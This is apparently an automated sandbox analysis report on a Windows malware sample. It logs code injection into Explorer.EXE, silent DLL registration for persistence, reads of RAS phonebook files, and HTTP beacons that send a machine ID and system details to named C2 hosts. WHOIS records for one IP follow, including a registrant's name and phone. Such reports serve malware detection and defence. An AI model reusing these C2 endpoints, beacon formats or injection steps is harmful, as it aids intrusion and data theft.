Creation Flags: () Enum Processes: Enum Modules - Target PID: (1256) Open Process - Filename (C:\WINDOWS\Explorer.EXE) Target PID: (1508) System Info: Get System Directory Thread: Create Remote Thread - Target PID (1508) Thread ID (1580) Thread ID ($7C80ACD3) Parameter Address ($00DF0000) Creation Flags (CREATE_SUSPENDED) Process Stsrted: Filename: C:\WINDOWS\system32\regsvr32.exe /s C:\WINDOWS\system32\1831.dll Filesize: 11776 bytes MD5: 9709ead856a690333138ac40804f914e Start Reason: CreateProcess function call File System Activity: Open File: C:\WINDOWS\system32\1831.dll (OPEN_EXISTING) Registry Changes: HKEY_CLASSES_ROOT\IEHpr.Invoke.1 "" = Invoke Class HKEY_CLASSES_ROOT\IEHpr.Invoke.1\CLSID "" = {5FB8C5D4-929F-4870-89E2-7E3EE26EE701} HKEY_CLASSES_ROOT\IEHpr.Invoke "" = Invoke Class HKEY_CLASSES_ROOT\IEHpr.Invoke\CLSID "" = {5FB8C5D4-929F-4870-89E2-7E3EE26EE701} HKEY_CLASSES_ROOT\IEHpr.Invoke\CurVer "" = IEHpr.Invoke.1 HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701} "" = Invoke Class HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701}\ProgID "" = IEHpr.Invoke.1 
HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701}\VersionIndependentProgID "" = IEHpr.Invoke HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701}\InprocServer32 "" = C:\WINDOWS\system32\1831.dll HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701}\InprocServer32 "ThreadingModel" = Apartment HKEY_CLASSES_ROOT\CLSID\{5FB8C5D4-929F-4870-89E2-7E3EE26EE701}\TypeLib "" = {ABBF3E09-6453-43cc-BC46-879C5DC5CB07} HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0 "" = IEHpr 1.0 Type Library HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\FLAGS "" = 0 HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\0\win32 "" = C:\WINDOWS\system32\1831.dll HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\HELPDIR "" = C:\WINDOWS\system32\ HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370} "" = IInvoke HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\ProxyStubClsid "" = {00020424-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\ProxyStubClsid32 "" = {00020424-0000-0000-C000-000000000046} HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\TypeLib "" = {ABBF3E09-6453-43CC-BC46-879C5DC5CB07} HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\TypeLib "Version" = 1.0 Registry Reads: HKEY_CLASSES_ROOT\.dll "" HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0 "" HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\FLAGS "" HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\0\win32 "" HKEY_CLASSES_ROOT\TypeLib\{ABBF3E09-6453-43CC-BC46-879C5DC5CB07}\1.0\HELPDIR "" HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370} "" HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\ProxyStubClsid "" HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\ProxyStubClsid32 "" 
HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\TypeLib "" HKEY_CLASSES_ROOT\Interface\{27FF85BC-FF68-40B9-BB0D-E92D065C0370}\TypeLib "Version" Process Started: Filename: C:\WINDOWS\Explorer.EXE Filesize: 1032192 bytes MD5: a0732187050030ae399b241436565e64 Start Reason: InjectedCode File System Activity: Open File: C:\WINDOWS\602384a2 (OPEN_EXISTING) Open File: C:\WINDOWS\9635-124-94 (OPEN_EXISTING) Open File: C:\WINDOWS\9735-124-94 (OPEN_EXISTING) Find File: C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk Find File: C:\WINDOWS\system32\Ras\*.pbk Open File: \\.\PIPE\lsarpc (OPEN_EXISTING) Get File Attributes: c:\autoexec.bat Flags: (SECURITY_ANONYMOUS) Open File: c:\autoexec.bat (OPEN_EXISTING) Find File: C:\Documents and Settings\Sandbox\Application Data\Microsoft\Network\Connections\Pbk\*.pbk Creates Mutex: RasPbFile System Info: Get System Directory Get Windows Directory Get Computer Name Process Started: Filename: C:\WINDOWS\system32\86a01.exe -i Filesize: 118784 bytes MD5: e3a84c700311f8ae35453a9f21c49720 Start Reason: CreateProcess function call Network Activity: HTTP Conversation: From SandBox:1035 to 60.217.234.138:80 - [343.boolans.com] Request: POST /ue000/38sw.e?uid=182424500012813521600397 Response: 200 "OK" Request: GET /list/2008-03-11/NO.y Response: 200 "OK" From SandBox:1036 to 219.148.34.7:80 - [110.770304123.cn] Request: POST /player/blog.updata?v=1.6.2.7&mid=c42aebc0c1d238cef55114fa2770db52&r1=0ff5aba1999384238a4c4249ea7d93ac&tm=2007-01-17 16:33:31&av=TD&os=Windows XP.2600 with Service Pack 2&uid=182424500012813521611131&cht=0 Response: 200 "OK" Unknown UDP Traffic: From SandBox:1025 to 192.168.0.1:53 State: Normal establishment and termination - Transferred outbound Bytes: 131 - Transferred inbound Bytes: 480 Unknown TCP Traffic: From SandBox:1038 to 60.217.234.138:80 State: Normal establishment and termination - Transferred outbound Bytes: 281 - Transferred inbound Bytes: 3661 Data 
sent: 4745 5420 2f6c 6973 742f 3230 3038 2d30 GET /list/2008-0 332d 3131 2f4e 4f2e 7920 4854 5450 2f31 3-11/NO.y HTTP/1 2e31 0d0a 4163 6365 7074 3a20 2a2f 2a0d .1..Accept: */*. 0a55 412d 4350 553a 2078 3836 0d0a 4163 .UA-CPU: x86..Ac 6365 7074 2d45 6e63 6f64 696e 673a 2067 cept-Encoding: g 7a69 702c 2064 6566 6c61 7465 0d0a 5573 zip, deflate..Us 6572 2d41 6765 6e74 3a20 4d6f 7a69 6c6c er-Agent: Mozill 612f 342e 3020 2863 6f6d 7061 7469 626c a/4.0 (compatibl 653b 204d 5349 4520 372e 303b 2057 696e e; MSIE 7.0; Win 646f 7773 204e 5420 352e 313b 202e 4e45 dows NT 5.1; .NE 5420 434c 5220 312e 312e 3433 3232 3b20 T CLR 1.1.4322; 2e4e 4554 2043 4c52 2032 2e30 2e35 3037 .NET CLR 2.0.507 3237 3b20 2e4e 4554 2043 4c52 2033 2e30 27; .NET CLR 3.0 2e30 3435 3036 2e33 303b 2049 6e66 6f50 .04506.30; InfoP 6174 682e 3129 0d0a 486f 7374 3a20 3334 ath.1)..Host: 34 332e 626f 6f6c 616e 732e 636f 6d0d 0a43 3.boolans.com..C 6f6e 6e65 6374 696f 6e3a 204b 6565 702d onnection: Keep- 416c 6976 650d 0a0d 0a Alive.... Data received: 4854 5450 2f31 2e31 2032 3030 204f 4b0d HTTP/1.1 200 OK. 0a44 6174 653a 2054 7565 2c20 3131 204d .Date: Tue, 11 M 6172 2032 3030 3820 3033 3a33 383a 3432 ar 2008 03:38:42 2047 4d54 0d0a 5365 7276 6572 3a20 4170 GMT..Server: Ap 6163 6865 0d0a 4c61 7374 2d4d 6f64 6966 ache..Last-Modif 6965 643a 2054 7565 2c20 3131 204d 6172 ied: Tue, 11 Mar 2032 3030 3820 3033 3a33 383a 3432 2047 2008 03:38:42 G 4d54 0d0a 4554 6167 3a20 572f 2231 3738 MT..ETag: W/"178 6362 652d 6435 662d 3765 6437 3433 3830 cbe-d5f-7ed74380 220d 0a41 6363 6570 742d 5261 6e67 6573 "..Accept-Ranges 3a20 6279 7465 730d 0a43 6f6e 7465 6e74 : bytes..Content 2d4c 656e 6774 683a 2033 3432 330d 0a43 -Length: 3423..C 6f6e 6e65 6374 696f 6e3a 2063 6c6f 7365 onnection: close 0d0a 436f 6e74 656e 742d 5479 7065 3a20 ..Content-Type: 7465 7874 2f70 6c61 696e 0d0a 0d0a text/plain.... Data received: 4c4b 0100 0000 0100 2c18 0d00 00f7 4c00 LK......,.....L. 0000 0000 0000 0000 0000 0000 0000 0000 ................ 
TCP Connection Attempt: From SandBox:1038 to 60.217.234.138:80

WHOIS - 60.217.234.138
Location: China [City: ]
inetnum: 60.208.0.0 - 60.217.255.255
netname: CNCGROUP-SD
descr: CNCGROUP Shandong province network
descr: China Network Communications Group Corporation
descr: No.156,Fu-Xing-Men-Nei Street,
descr: Beijing 100031
country: CN
admin-c: CH455-AP
tech-c: XZ14-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP-SD
mnt-routes: MAINT-CNCGROUP-RR
status: ALLOCATED PORTABLE
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: **********@apnic.net 20040705
changed: **********@apnic.net 20060125
source: APNIC

route: 60.216.0.0/15
descr: CNC Group CHINA169 Shandong Province Network
country: CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
changed: *****@cnc-noc.net 20060118
source: APNIC

role: CNCGroup Hostmaster
e-mail: *****@cnc-noc.net
address: No.156,Fu-Xing-Men-Nei Street,
address: Beijing,100031,P.R.China
nic-hdl: CH455-AP
phone: +86-10-82993155
fax-no: +86-10-82993102
country: CN
admin-c: CH444-AP
tech-c: CH444-AP
changed: *****@cnc-noc.net 20041119
mnt-by: MAINT-CNCGROUP
source: APNIC

person: XIAOFENG ZHANG
nic-hdl: XZ14-AP
e-mail: **@pub.sd.cninfo.net
address: Jinan,Shandong P.R China
phone: +86-531-6666666
fax-no: +86-531-6666666
country: CN
changed: **@sdinfo.net 20050330
mnt-by: MAINT-ZXF
source: APNIC